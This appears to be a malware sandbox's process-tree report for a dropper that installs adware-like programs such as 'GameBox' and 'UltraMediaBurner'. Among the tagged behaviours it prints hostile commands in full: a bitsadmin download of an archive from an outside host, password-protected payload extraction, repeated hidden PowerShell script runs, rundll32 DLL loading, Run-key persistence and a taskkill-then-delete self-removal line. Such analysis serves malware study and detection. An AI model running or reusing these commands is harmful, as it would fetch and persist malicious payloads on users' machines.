C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5372 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5352 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5916 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6880 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3156 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1068 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5572 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5976 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5544 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7288 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7304 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7208 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7380 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6676 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 66765⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6676 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 66765⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Kills process with taskkill
-
C:\Users\Admin\Documents\gw4IdvE5G_HLuaXzgZeN_Zqp.exe"C:\Users\Admin\Documents\gw4IdvE5G_HLuaXzgZeN_Zqp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z3⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXd6xLoKVfw7mBXV -y x C:\zip.7z -o"C:\Program Files\temp_files\"3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ptZ6g68Nm4l7O2bj -y x C:\zip.7z -o"C:\Program Files\temp_files\"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\itLdAUYMscN\itLdAUYMscN.dll" itLdAUYMscN3⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\itLdAUYMscN\itLdAUYMscN.dll" itLdAUYMscN4⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT3⤵
-
C:\Users\Admin\Documents\kDEcdwOxWvP_PYOYppAsUgAi.exe"C:\Users\Admin\Documents\kDEcdwOxWvP_PYOYppAsUgAi.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KG51M.tmp\kDEcdwOxWvP_PYOYppAsUgAi.tmp"C:\Users\Admin\AppData\Local\Temp\is-KG51M.tmp\kDEcdwOxWvP_PYOYppAsUgAi.tmp" /SL5="$20240,138429,56832,C:\Users\Admin\Documents\kDEcdwOxWvP_PYOYppAsUgAi.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V7GCN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V7GCN.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4391711.exe"C:\Users\Admin\AppData\Roaming\4391711.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1996 -s 23607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3667653.exe"C:\Users\Admin\AppData\Roaming\3667653.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7209319.exe"C:\Users\Admin\AppData\Roaming\7209319.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8046740.exe"C:\Users\Admin\AppData\Roaming\8046740.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 21847⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A2DA8.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-A2DA8.tmp\MediaBurner2.tmp" /SL5="$302D8,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-F3DBT.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-F3DBT.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe"C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-20GJM.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-20GJM.tmp\ultramediaburner.tmp" /SL5="$302CE,281924,62464,C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\6f-697da-1d4-032ac-3d117ce4fbd54\Werocamocu.exe"C:\Users\Admin\AppData\Local\Temp\6f-697da-1d4-032ac-3d117ce4fbd54\Werocamocu.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4b9c46f8,0x7ffb4b9c4708,0x7ffb4b9c471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:110⤵
-
